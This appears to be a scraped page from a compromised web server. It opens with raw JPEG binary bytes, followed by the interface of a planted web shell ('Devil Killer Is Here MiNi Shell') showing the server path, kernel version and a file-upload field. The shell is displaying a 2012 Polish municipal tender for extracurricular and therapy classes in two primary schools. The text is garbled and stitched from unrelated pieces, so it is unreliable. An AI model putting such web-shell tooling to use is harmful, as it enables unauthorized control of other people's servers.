JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/182597-N-2012.html

<p class="kh_header"><b>Pokój: Ja w szkole II</b><br>
<b>Numer ogłoszenia: 182597 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pokój , ul. Sienkiewicza 8, 46-034 Pokój, woj. opolskie, tel. 077 4693085, faks 077 4693085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminapokoj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ja w szkole II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć pozalekcyjnych (dydaktyczno - wyrównawczych oraz rozwijających zainteresowania plastyczne i teatralne, specjalistycznych zajęć terapeutycznych dla dzieci niepełnosprawnych, zajęć socjoterapeutycznych i psychoedukacyjnych dla dzieci z zaburzeniami komunikacji społecznej, zajęć logopedycznych i gimnastyki korekcyjnej  w klasach I-III w 2 szkołach podstawowych, w ramach projektu Ja w szkole II. Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Jednostkowy czas trwania godziny zajęć rozwijających zainteresowania we wszystkich wyspecyfikowanych grupach tematycznych wynosi jedna godzina lekcyjna rozumiana jako 45-cio minutowy wymiar. Zgodnie z § 13 ust 1 rozporządzenia Ministra Edukacji Narodowej z dnia 17 listopada 2010r. w sprawie zasad udzielania i organizacji pomocy psychologiczno -pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2010 r. Nr 228, poz. 1487): godzina zajęć rozwijających uzdolnienia i zajęć dydaktyczno-wyrównawczych trwa 45 minut, a godzina zajęć specjalistycznych - 60 minut.

Prowadzący zajęcia pozalekcyjne będzie odpowiadał za przygotowanie, realizację i dokumentację zajęć dodatkowych dla uczniów, działania dostosowywane będą do potrzeb uczniów w ramach zajęć. Zadanie obejmuje: prowadzenie zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym zagrożonych ryzykiem dysleksji, zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych, zajęć indywidualnych dla dzieci niepełnosprawnych, specjalistycznych zajęć terapeutycznych, zajęć socjoterapeutycznych i psychoedukacyjnych dla dzieci z zaburzeniami komunikacji społecznej, zajęć logopedycznych korygujących wady wymowy, prowadzenie gimnastyki korekcyjnej dla dzieci z wadami postawy w tym zajęcia na basenie, a także rozwijających zainteresowania uczniów uzdolnionych z uwzględnieniem zajęć plastycznych i teatralnych.

Wykaz zajęć, które będą realizowane w Publicznej Szkole Podstawowej w Pokoju w ramach projektu JA W SZKOLE II realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych:
1.	dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla I grupy, realizowanych  w formie zajęć wyrównawczych . 
2.	 dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla II grupy, realizowanych  w formie zajęć wyrównawczych
3.	dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla III grupy, realizowanych  w formie zajęć wyrównawczych
4.	dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w wymiarze 30 h (1350 minut), realizowanych  w formie zajęć wyrównawczych w ciągu 1 r. szk. dla I grupy
5.	dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w wymiarze 30 h (1350 minut), realizowanych  w formie zajęć wyrównawczych w ciągu 1 r. szk. dla II grupy, 
6.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla I grupy uczniów
7.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla II grupy uczniów
8.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla III grupy uczniów
9.	zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej  w wymiarze 30 h (1800 minut)  w ciągu 1 r. szk., 
10.	gimnastyka korekcyjna w wymiarze 50 godzin (2250 minut) w ciągu 1 r. szk., w tym zajęcia realizowane na basenie 5 wyjazdów - 10 godzin (600 minut) zajęć na basenie dla I i II grupy uczniów
11.	specjalistyczne zajęcia terapeutyczne, indywidualne dla dziecka niepełnosprawnego wymiarze 30 h (1350 minut) w 1 r. szk. dla 1 ucznia.
12.	zajęcia rozwijające zainteresowania uczniów uzdolnionych plastycznie w wym. 30 h (1350 minut) w ciągu 1 r. szk. 
13.	zajęcia rozwijające zainteresowania uczniów uzdolnionych teatralnie w wymiarze 30 godzin w ciągu 1 r. szk.  oraz udział z uczniami w 2 spektaklach teatralnych w Opolu.

Wykaz zajęć, które będą realizowane w Szkole Podstawowej z Oddziałem Przedszkolnym w Domaradzu  w ramach projektu JA W SZKOLE II realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych:


14.	dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla I grupy, realizowanych  w formie zajęć wyrównawczych . 
15.	 dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla II grupy, realizowanych  w formie zajęć wyrównawczych
16.	dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych dysleksją w wymiarze 30 h (1350 minut)  w ciągu 1 r. szk. dla III grupy, realizowanych  w formie zajęć wyrównawczych
17.	dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w wymiarze 30 h (1350 minut), realizowanych  w formie zajęć wyrównawczych w ciągu 1 r. szk. dla I grupy
18.	dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w wymiarze 30 h (1350 minut), realizowanych  w formie zajęć wyrównawczych w ciągu 1 r. szk. dla II grupy, 
19.	dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w wymiarze 30 h (1350 minut), realizowanych  w formie zajęć wyrównawczych w ciągu 1 r. szk. dla III grupy, 
20.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla I grupy uczniów
21.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla II grupy uczniów
22.	zajęcia logopedyczne w wymiarze 30 h (1800 minut) w ciągu 1 r. szk. dla III grupy uczniów
23.	gimnastyka korekcyjna w wymiarze 50 godzin (2250 minut) w ciągu 1 r. szk., w tym zajęcia realizowane na basenie 5 wyjazdów - 10 godzin (600 minut) zajęć na basenie dla I i II grupy uczniów
24.	zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej  w wymiarze 30 h (1800 minut)  w ciągu 1 r. szk., dla I grupy uczniów
25.	zajęcia rozwijające zainteresowania uczniów uzdolnionych plastycznie w wym. 60 h (2700 minut) w ciągu 1 r. szk. 
26.	zajęcia rozwijające zainteresowania uczniów uzdolnionych teatralnie w wymiarze 30 h (1350 minut) w ciągu 1 r. szk.  
Do obowiązków prowadzącego będzie należało m. in.:
a)	prowadzenie zajęć pozalekcyjnych (zajęcia po obowiązkowych lekcjach i w dni wolne od nauki w szkole, w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie maksymalnym do 30 czerwca 2013 roku; 
b)	dodatkowo dla prowadzącego zajęcia z zakresu:
- gimnastyki korekcyjnej:
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzoną analizę dokumentacji służb medycznych
 2. Bieżące informowanie Zamawiającego na piśmie o przypadkach rezygnacji uczęszczających    z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ skorygowanie wad postawy u 80% dzieci uczęszczających na zajęcia gimnastyki korekcyjnej w okresie do końca realizacji projektu. 
10. Przekazania Zamawiającemu, po zakończonych zajęciach następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć 
      - rozwijających zainteresowania uczniów uzdolnionych plastycznie:
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzony test kompetencji 
2. Bieżące informowanie Zamawiającego  na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zapewnienie każdemu dziecku, objętego wsparciem w ramach projektu, oferty edukacyjno wychowawczo-profilaktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, w okresie do końca realizacji projektu.
10. Przekazania Zamawiającemu, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć
wybranych  prac plastycznych  wykonanych przez uczniów biorących udział w projekcie  / format a4 jedna teczka - min 30 prac)
-  zajęcia logopedyczne
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzony test kompetencji / analizę uczniów w zakresie wad wymowy
2. Bieżące informowanie Zamawiającego na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zapewnienie każdemu dziecku, objętego wsparciem w ramach projektu, oferty edukacyjno wychowawczo-profilaktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, w okresie do końca realizacji projektu.
10. Przekazania Zamawiającemu, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć 

- zajęcia socjoterapeutyczne i psychoedukacyjne
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzony test kompetencji / analizę uczniów w zakresie zaburzeń komunikacji społecznej
2. Bieżące informowanie Zamawiającego na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zapewnienie każdemu dziecku, objętego wsparciem w ramach projektu, oferty edukacyjno wychowawczo-profilaktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, w okresie do końca realizacji projektu.
10. Przekazania Zamawiającemu, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć 

- Specjalistyczne zajęcia  terapeutyczne, indywidualne dla dzieci niepełnosprawnych  
1.  Przygotowanie programu zajęć dla ucznia/uczennicy projektu w oparciu o przeprowadzoną analizę dokumentacji 
2. Bieżące informowanie Zamawiającego na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zapewnienie każdemu dziecku, objętego wsparciem w ramach projektu, oferty edukacyjno wychowawczo-profilaktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, w okresie do końca realizacji projektu.
10. Przekazania Zamawiającemu, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć 

-zajęcia rozwijające zdolności teatralne
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzoną analizę  zainteresowań uczniów.
2. Bieżące informowanie Zleceniodawcę na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zapewnienie każdemu dziecku, objętego wsparciem w ramach projektu, oferty edukacyjno wychowawczo-profilaktycznej zgodnie z jego indywidualnymi potrzebami i możliwościami edukacyjnymi i rozwojowymi, w okresie do końca realizacji projektu.
10. Przekazania Zleceniodawcy, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety/ testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć 
organizacja i udział z uczestnikami projektu w 2 spektaklach teatralnych w Opolu - dotyczy zajęć w  Publicznej Szkole Podstawowej w Pokoju
- zajęcia wyrównawcze
1.  Przygotowanie programu zajęć dla uczniów i uczennic projektu w oparciu o przeprowadzony wewnętrzny  test kompetencji   i analizę dokumentacji uczestników projektu
2. Bieżące informowanie Zamawiającego na piśmie o przypadkach rezygnacji uczęszczających z   	uczestnictwa w zajęciach w trakcie ich trwania. 
3. Prowadzenia listy obecności z własnoręcznymi podpisami uczestników/czek zajęć.
4. Prowadzenia dziennika zajęć.
5. Przeprowadzenie testów na początku i po upływie 75% zaplanowanych godzin  oraz po zakończeniu zajęć przeprowadzonych w czasie trwania projektu.
6. Informowania uczestników/uczestniczki projektu że zajęcia finansowane są ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.
7. Przeprowadzenie ankiety wśród rodziców uczniów objętych wsparciem.
8. Współpraca z wychowawcą i pedagogiem szkolnym. 
9. Osiągnięcia celów szczegółowych projektu :
a/ Zminimalizowanie specyficznych trudności w uczeniu się u 80% uczniów objętych wsparciem 
10. Przekazania Zamawiającemu, po zakończonych spotkań następujących dokumentów:
listy obecności uczestników spotkań
sprawozdanie merytoryczne z wykonania zlecenia.
kartę czasu pracy z zajęć zawierającą wymiar godzin oraz tematy zajęć
dzienniki zajęć
ankiety - testy  monitoringowe badające postęp uczęszczających na zajęciach.
dokumentacji fotograficznej z opisem wykonanej na własnym sprzęcie, dokumentującej realizację zajęć.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 26.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności przedstawi poniższe informacje w formie określonej wg załącznika numer 1 odnośnie: 
SP Pokój do części 1-5 : osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej (prowadzenie zajęć wyrównawczych),
Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Pokój do części 6-8 : osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe w zakresie logopedii z przygotowaniem pedagogicznym lub wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny z zakresu logopedii ( prowadzenie zajęć logopedycznych korygujących wady wymowy), Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Pokój do części 9: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej i ukończone studia podyplomowe lub kurs kwalifikacyjny uprawniające do prowadzenia zajęć socjoterapeutycznych i  psychoedukacyjnych (zajęcia socjoterapeutyczne i psychoedukacyjne), Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

SP Pokój do części 10: osoba posiadająca co najmniej stopień awansu zawodowego minimum nauczyciela stażysty oraz wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i ukończone studia podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej (prowadzenie gimnastyki korekcyjnej dla dzieci z wadami postawy w tym samodzielne prowadzenie zajęć na basenie). Posiadają wpis do właściwego rejestru jednostek szkoleniowych (dotyczy firm szkoleniowych). 

